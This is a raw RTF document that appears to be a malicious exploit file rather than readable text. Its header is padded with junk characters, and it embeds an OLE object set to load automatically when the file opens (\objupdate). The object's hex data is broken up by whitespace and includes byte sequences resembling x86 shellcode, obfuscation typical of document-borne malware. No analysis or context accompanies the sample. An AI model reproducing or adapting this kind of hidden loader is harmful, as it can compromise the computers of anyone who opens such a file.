{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objocx\objupdate\objw6296\objh3196{\*\objdata 629b87 4402 0000 000500 00 0047615
06
e0
000 0 000 0000
0
0 00 0 00 01 0 0000d0c
f11e0a1b11 ae1000000 0000 000 0 0000000 0000
00 00 00 03
e00 0300feff 09 0 00600	0000	00	00	00	0000	00	00	000100
0	0
0
0010	00000	0	00
0 000
0
001 0 00
0
00 2000
00
0
010
00 0
00 f ef ff fff
0 00
0 00
000000000 0ffff fffffffff fffffffffff f ffffff	f fffff ffff fffffff f fffff fff ffff fff f fffff ffffff fff fffff fffffffffffffffff ffff ffffffff fff fffffffff f
ff ff f f fff f
fff
f
ffff
f
f
f ff ffffff ff ffff	f	f	f
ff
ff	fff	ff
ff
f
ff	ff	fff
fff	ffff fffffff fffffff f	fffffff	ffff	ff	ffff	f	f	f
ff
f
f	f
f
ffff	ff	ff
ff fffff ffff
ff	f	ff
fffff f
f
f
f f f	fffffffffff	fffffffff ff ff fffffff ff f ffff fff ffff	fff	ff	f	ffffffffff	ffffff	fff	ffffffff	fffff	fffff ffff ff ff ffffff f f fff f fffffffff f
f fffff f f f
f ff fffffff
f f
ff ff
fffffff
ffff	fffff f
f
f fff fff fff f ff f ff f ffff
f ffff
f
fff
ffff ff f ff
ffff
f
fff fff f
f
f
ff f f f
ffff fff
f
fff ffff ff f f ff fffffffff
f f	ff
fff	f
ff	f	ff	ffff
fff
fff
ffff
f
fff	ffff
f	f	f
ffff
f
f	f ff f
fff
f f f
f ffffff
f f f
f
ffff ffffff
f	fff
ff
fff	fffffffffff	fffff	fff f ff	fff	ff
ff
fff
fffff	f
f
ffffff
f
f	f
f	f	ffffffff
f	fffffff
f f f
fff
f
ff
ffff ffffff
ff ff ff
ff ff ff
f
f
fff f
fffff f
fff
f f ff
f f
f f f
fffff	ffffff	ffffffffffff	f	ff	f	f	fff	ffff	fffffffffff	ffffffffff fffff ffff ff f fff f ffff fffffffffffffff f ff ffffffff f ff ff
ffff f ffffff ff ffffffffffff fffff ff ff f f
f	fd	ff
f
fff	f e
ff ff f
f feffff ff0
4
00
00 0	0
05	0	000
0
0
06
0
0	00	0	0fef f
ff ffff fff
f
f
ff
f
ff	f	f	fff
f
ff	f	fff
f	f	fff	ffffff	ffffff	ff
ff	f	fffff
f
ff
f	ffff
ff	ff	f
f
ffff	ffffff fffff f fffffff
f
f
f
ff fffff fffff ffff fffffffffffff fffffff fff ffff ff f f ff ffffff f
ff	ff
fff	ff ff
ff ffff
f
ffff
f
ff f
f f ff f
f
f fff
fffff
ff
fffff fffff ffff
ffffff f
ff
fff
f
ff
f	ffffff	fff
ff	ff
ffff	f	fff	ff
f
f
ff
f	f	fffffff	ff
f
f	ffffff	f
f	fff	fff	f	ff
f	fff	f
f f ffff
f f	ffff	f	ff	f	f fff
ff
f ffffff f
ffff
ffff ff f fff ff ff f
f
fff fffffffffffff ff fffff f fff f fffff ffff f ff f f	fff	f	fffffffff	f	f	fffffff	ff	fff	f	fff	fff	ffffff	ffffffffffffff fffff
f fff f f
ff f
f ffffffff	f	f	ffffff	f	f	fffff f ffff fff ff	fffff	f	fffff	f	f	ff	fff	f	f	ff	f fff f f f	ffffff	f	fff	fff	f	fffffffffffffff	fff	f	fff f ff ffff f
fff
f
f	f
f
ffff	fffffff	fffff	fff	ffffff
f
f
fffff	f
ff	fff	f	fff	fff	f	ff	f
f	f
f
f
f	ff	f
f
fff	fff
fff
ff
f	f
f	ffff	ff
ff	fff
ffff
f	f	ff	f
f
ff
ff
f
ffff
f	ffff	ff	f	ff	f	ff	fff
fffff
f
f
fff
f	f
ff
ff	ff
f
f
ffff	ff
ff	f
f	f
f	ff
fffffff	f	ffff	fffffff	f	ffffffffff	f
fff	fffffff	fff
ffffffff
ff
f
ff f ff
f ffff f
ff
fffffffffff ffffff fff f f
fff fff ff
f
f
fffffff fff fffff ff
ff f fffffff ff fffff	fffffff	ffffffffff	fff	f
ff
f
f
f	ff	f
ffff
fff	f	ff	f	f
f	ffff
ff
fff	f	ffffffff	fffffff	ffffffff ffffffff ff ff	fff	f	fffffff	f	fffffffffffffff	f
f
f
ff
ff	f
ff
ff
5	200
6	f00	6	f0	0	7
4	0	020004	5 0 0 6e0
0 7
40
0 7 20
0
79
0000000
00 000
0 0 0 0 0
00
0000
00000 0 00000 0000 0000 000 0	00	00	00	0
00
000	0	000	000	000	00
00
0
0
00000
0	00	000	0	0
0
00160
00	50	0f	ff	ffff
fffffff	f	f0
100000
0	0
2ce	02000	0	0	0	00	00c	00	0000	00	00	00046
0	00	00
0	0
0
0
0
0	000000000
0	00	0c03bda079c	2 3d40 1 0	30	000	0000070000000000	0	001004f	00
6	c006500
31	0	03
0	004	e0	06
100
7
4
0
069
00760	06	5
0	0	0
000	0
00
0
000	0	0
00
0	00	000000	0
0
00 0000 0000000 00 00 000000 00 00000
0000
00 000	000	00	0	0000
000
0	01a0002	0
1
ff
ffff	ff
f	ff
ffff	ff	f
ffff
ff	000
0
00	00000	00000000	00 0 00000	0
000	00
0
00
0	00
0	0000
0
0	00
0
00	0
000	000
0
0
000
00	0	000	0	00
00
0	00
0
00d9
0	60
000 0 00
0
0 0 00 0 0000
0
0 000 0
0
00 00000
000
000000000 0 000 00 000 0 00 0	00	0000000	0	00	0 0 000 00 0000	00	000
0	00	0
000	0000000	0	00000000000000	0000	0	00	00	0000	000	0000	0	0000 0000 0000 0 0f fffffffff
ffff
f f
f
ff
fff
ff0
0 0 00 0000 0000 00
0 0 0
0 0000 00 000 0 000	00	0	0	000	0	000	0	0	0000000	0	0	0000 0 0 0 0 0 00000 00 00 0 000000 00 0000000	00	0	000	000	0000	0000
0000000000	0
0
00
0
0
00	0	000	000	00	00	0	0	0000	00	0	0
00000000
0	0000	00000	000	0000	0 0 00000
00000
0 0 0
000 0 0 0000
0 0
0 0
00 00
0
00 000000 000 0
0
000000000 0000000 0	fffff	ffffffff	f fffff ff fff00 00 0000000 00000
000000 000
0 00 000 00 0
000
00
0
00000 00
0000
0 000 0 0
0 0
0 0000
00 0 0
0 00 0 0000000 0 00000000 0 00 0000 00 100 0000020
0	0	0	000300	000004	0	000	00	0500	0	0	0	0	0600000007	00	000	008	00	0000	09	00	0	0000a000	0000b0000000c00	00000d00000	00	e000
00
0 0
f00 00
00
1 0 0 0
0
00 0
110 00
00
0
1
2000 00 0
1 3
000000 140000 00 15000 0	0016000	0001 700000 018000000190 000 0 01a 00 0 0001b0
0
0
0 00fef
ff fff
f f f fff
fff
f ffff ff ff
ffff
ff ff ff f ff	fff
ffff ff
ff ff fff ffff	fffffff	ffffffff	fff
fff
ff	ff
fff
fffff ffff
f
f
ff
ffffff ff ff	ff	ffffffff	fff	f	ff	fff f f f ff ffffffff f f fff ff f f f ffff f
f f f
ffffff
ffff fff ff fff
f f
fff ff ff fff
f
ff ff
fff f f ff	f
f	f
f
ffff
ff
ff
f	ff
ff	fff
ff	f	ffff	fffffff	fff	ff	ff	f fffffff
f	ff	ff
fff	ff	f
f fff
f ff ff
ffff f f
ff fffff
f
f ffff fff
fffffff fff f fff f ffffff ff ff f f ffff f f ffff ff ffffff ffffffff ffffff fff	f	ff	ff	ffff
ff	f	f	ff
f	fff
ff	f	f
fffff	ff
ff	ff	ff	f f
ff fff
ffff
fffffffffffffffffffff fffff ffffffffff ffffffffff ffffff fffffff fffffffffffff ff
ff
fffff
ff f ff
ff fff f
f
f f
f
fff f ff f f
f f ffff f ff fff
f
f
fff f
f
ff ff
fff ffffff f f ff
ff f	fff	ff
f	ff
ff
ff
fff	ffff
f	f
f	ff
fff	f	f ff ff
f
f
f
ff
fffff
ff fff	fffffff	ff	fffff	ff	fffffffffff	f	f	f	f
fff	fffff	ffff	fff
f
ff	f	ffff
fff
ff	f	ff	f
f
f	ff
ff	f
f
ff	f
ff
f	f	ff	f	f	f
fff
ff
ff
fffffff	f	f
ffffff
ff
fffffff
f	f	f
f	ff
f
f
ff
f
ffffffff	ffff
f
ffff f f ff f ff f ff ff f
ff
fff f f ff ff
ffff
ff
fffffffffff ffffffff ffffff ffffffffff ffff
f
f
ff d50 600000 3 d e 0
1 c
92
e
0a
0 1
089e
0
8ba 3eff c744 81e	23cbd7	d188b	3a8b37b9be	81	a	42081f10ee6	e	2208	b01	5	6ffd	00 5ed 3a03ed0 5 aa c	5	fc	12f	fe0
67	88d34
3
0
0
a0a5
1
b
5
57	605c	ed
c74da1	cb07e954
7aad2
b5
c85f	dd2	bc cb354
f
d 8
9
3eb 4 e4fcb1d 4 bb8443 132 66e9c f	9adf5bd	b
f3	1a13be 50d34e5af9f7b2 5e1b7343 a 8 e9b 5d0525 0c9f 2db 10 23
ba f2
c 2 67
e 2 8
4caed
8 06	a	1	f77
4d0 8
e48
023
a c2 88 85 b36 4e921010 000ad18
01 bf
24 9	62e	2	5f	4	3d	37
16
5
bb935
4
e
5
da5a
4	9	e0	1
d
3a42
78e
8
a
3a	a2d7
c08
e
996
8622cacde9 646cf0 e eced 86 5ab1 5b 31e120 2c3d c baaa
1
6c 8 236d e 16f4
5c	2
967
d	5a	a	3	2	9	ed	8	e1474efa	379	d9db894	8a	89	5	6	d	5cf20	16	0
d
c7c5 87bfb a6
eb4
270e
e
a72709
01 395fbb 220
38 9 f
c5
d8f
9 e 54 3 d 6
3a4a
0
9
c
96 37e 96 b 21d a64f2 c 9 5 9fbba0 c 132
c88
e
9
26
204ca 47a5
e7
b9 9 b
2 3	0
699
1	2f9
5
cb6	327b	8db7c36a1ccf1	743b	10	d3f71588e5096c2c8a6 c882b e1cc f4f4f5868 49
68 0
0852e4 efc 8ca3 d7ba9570ae70a dc2934f17679ad 58615690067 a37b91134 f61501df9	f	c	448	a64 c4ff1 27805d066841e106 575 c2566
42138 c 4
6b 8
1 9 d3a7a	ef1ea
0
c0
6b 3d 1
e e4d
d 1 76 33f4 a91 e 21d1fad 10006	cbea	adc26ad	eb5d	6533d5	1f	a6	1e72f	1	0795081b	8	e4c69 966 5d 22556e97 7010000 9c5350 530
5aa 4 30 0
00053
c5	4000
08
1ebc
20
e0
0005b	9c57
5
653	81c	7ae15	00008db	67a3	c	0	0	00 8d9b 0465 00 0
0
81c7e b0a0000 81eb2 04 c00008db e 9 e7 8
000
0 5b 5
e
5f9
d 585b
9d	eb05e	9d7	00000	05	e	eb48eb0	7e9e900000	0eb44	e8a5010000e	b36589c 5681 c 6463f00
0081ee 134c 00	00	81c6437	500005
e9	d5	f
eb	15e	b	0
7ebcfe9d0	0000	0005b5
14
ef
3	c31	06e9d300	000 0e
9 e900
0000e be d e
bc883 c 6
4ce bb5e 9 d700 00009 c57 56 57 8 1e fd a 37 0000 81c
7c e7f 0 00
05f5e5f575f 9d
e b
6a9c 53575
3 8d
bfe2
50 0 0
00
8
1c 7
02
3
b0
0 0
0 8 1ebe
f 0	d
00	009
08
d
b
b
3
23c
0000	5	b5f5b 9de9 86 0000009c 538	1c	3c6	0f0	00	0eb06 62 f763	78a69f	8d	9bac	3400	008d9b	095e	00	00	81e	b85110	0005b9	de	b28	9c56	81ee2	91d	0	00081ee224d
00
00 8
d b
6277d0 00 05e 9d8d8 f6f fcf fff e b2f 69 c08 70c3a7aeb3a eb46e 81 affffffe9 0e fff	ff	f	eb06227	bd4e0fc4	b8d
b	e91
0
300	0	0	6bc 0 0
0e96 a f
f	f
f	f	f
e	92
9ffffffe 9 01ff f
f ff e9 0
3fff fff e91 8
f
f
ff f feb
0 7e b17 e
9 18
f ffff f83 c 6
04
39fe7
2b
2eba 8e9d 4
fe
f ff	f5750 e b87
5ec 3 dd 149 b3c5c
7c
8 d8 6 f7
6
d
52
7 fff9 7c 5
eb 0a e3	df149	7b	a7	d	c018	4dc1d	a8	ecd 1c 32 7	2049e	a5	a2375ad	8	5bdf	77fe03e	1c	54	fb	736888
3
e8
3	2	92a1
aee2
0	d	4e2	f	136	2	c
c
5	b3b7a	1 f1
0eb d75
78 d18
c
7
c
451a30e6b69 d 2
0 2 7e
6b a
2
3f396f
40b
6
b c
b0 d 0f
a
3
8
9ab	a3	91a	419	7020
9	a81 9
6
0 d c e
c
d c2674
e4b5fe
d
9b
d09
0 b
68b36 5c71ff8
06
8
d5f35 829829 f db39d 95a1ab 27 055 00 7ccdd256	9	5	b 72f1 d4 f8f902ad 72 b18f 3d6 db 0686e5
0 d3
d d6e
e	49	b	5	2
2	6
0	2	a3
f1b7
3
c	b4c0	e	c	0e
8
5	e73ea570b5	c
a250	ec0	5	02f2	e	7	8
547	75
3	17
96	ec425d26a46990	59b7a
12e8
2
6
303	4
7ef	f5
26b
9d65
e
de
6
0
7746	1
49
30
3f	d96	75
0a13f21	c
e b 6
5d ee61
b
d
6 8 50
5	13	b	d	8ba	0	a5	b0
e5
4f346f 3 cfd729 8bf6 5e4ab c4 d5 86 8d50
b cdc f 5 7
4
5b 898 f7
79aa 15f
f
0 fcc
7 3 0 7
717
d8dde
a
2
d 8
fa2bde a60 a05 27d04 e	a	9	b d 2e05a15 a08 5d709380e86	7ee9c	b	671	b0	bc7f3ec	404	8a	c8875	161	6	119496	b	8b7df69f	3	668568	9c3fd	a9	fa
8	86	5
2
f
f
5 7	5bb6	c6
6
0ac	1f62a495d186	9aa	f6	2d567	6e	1	1ba 7a 0 e e276f3e20838f	d94	27d9	a791c	e4f496d8 06c2e c6b c 384 ac 6 2 322 5c4
24 d4e
2 750 5
c 7 82b 24 6
e4
9 b19 2 48 b 9	9
3f
b
ac3	5
a	2cd	2	00
11	e
37
e
1c27	1d650c97	c	60a	91 fb2	b21	5b7	2c1e1 28 4 a0 a09 31c b fa719d176	19c0e7	6	a7	97e8	bd7
43b0	c	6
3
1d
43d
79
9ef	a	e
47	a7
d	17
ae	873	b59	31a28	07a	c8	9c 6 fa32 9b 6c657 8	4fc2c52fd	2f9	1	0546	52a8a	1e	9abe407	049d89a	6	443e07
95	01	9	b7
5
6	d
8
b	1	e	3
dcc6521e3	f3eb72bc7	e2683bb8d	53b
57cf
5	3	b83b37	93a7ccc81f486
3	e31ed6f98	e8195cc	d	94ae 3
4
b
21 e14 532 b5 5
0
4 12 4de
4 3
dcd968 4fe e fb9 78ab7 4900bb86cd7 ab	1
37 2 50
401f e
8
bf 2e7 dce 4
1
90 1
2 0 9 1 c7
7
2723
7bc5 f 8
b 7
1 b a7
fc
5 4 b6 1
be20c 67e
23e 3 2
deb20 94 bc c
fce5
6f
6 25
3 5 5b 5 f
03
3
d27
91 32 49d
b
f
f
05
39d fb2 6	2b
8 0 20738
6b6f812 c5f
53ce 7 7b4 db92 4 a8991c78 f8225f2
87ebb27	815f	f5e1a	e	6d	2	ff	9146194171f	5baeaf	82
79d
9c	d
e
c
0	df
01	1
d	f
849
f91	927fd13	9e	aa
545	9
e3 0
4
5
c0
f
3
e6	e89e9e
c	3	9	b
9
a	6
3ace668	a4	d	c	3c
a3338ae28b
0
57	9b
d	d4
ca	8e3c	b	d
9b	b	4976d11684	155be	2c2	4	e90b6d	4e0	f	37	fa	f7	4	9	8c	c3ab	05	86 ae315892874c78156 9b66fc41 1	5	ed1572ee85	b7350	74caaef	b	ca	d0d	e1e	1 2093 9 e c4 0 f85a072 17deed215a0f 1 d255 6 185d908 a b
0 b 38	4c2d	f 2378370681a25c5 32735	8	d
c	66
7	b
b
eb12c4
a
4	414	55
4
6 8
4 1 9a 91f
ed 71 6
270
d	c
8 dd
93551 5 51209 73 4b a7c b3d4e d0 c	d	b953	0c0d7	1946	42	fb 9	bc650f	5a5	f4e	9a23 e5 9 a5be
2b0
e3659beb 23
29abbb 6 0df 76 894 6305880ad12b	a	51f68c51c9431a	7f
005	1
e
3a	4	3
9
97e9ad
8 0
5 16 f 3 6 78
0
0
0 0 00 0
0 00 0000 0
0
000 00 0
000 0
000 00
0
0 0
000
0
0000 000	0000 0 0 0000000 000000 0000 0 0000000 0	0000	000000000	0000	0	0000000000
000	0000	000
00
00	000 00000	000	00	00	00000	00	0000000
0	00	00
00	0
00000	00	0	0	00
00
0
0	0	00 000000
0
0 0 0 0000 0
0000
00000 000 00
00000000
0
0000
000
0 00000 00000 0000000 0000	000	000000	0000
00
000	0
0
00	000
00
000 00000 0	0	00
0 00000 00 00
0
0
00 0 0
000000 000000 00 0000000000000000000 0000000 0 0 0 000000 00 00 0000000000 00 000 00 000 00 0 00000000 0
0 0
00 0
0
00 0
0 0
00
0 0 0
0
000 000
0 000 00
00 0000 000000 0
0 00
00
0
000	0	0
0
00000
00
0
0
0 0 000
0
0
00
000 000000	00000	0	0
0000
00000	0
0	0000	000
0
0
0000000
0	000
0	00	000	0	000
0	0	0	00	0	00	0
00
0
0
00 0
0
0
0 0
00
000
00
0
00 00
0000 0
0 0
000
0 00 00 00 0 0000000 0
0
0 0
0
0000 000000	0	0	0	000009beafa690 0
0 0
0000}}}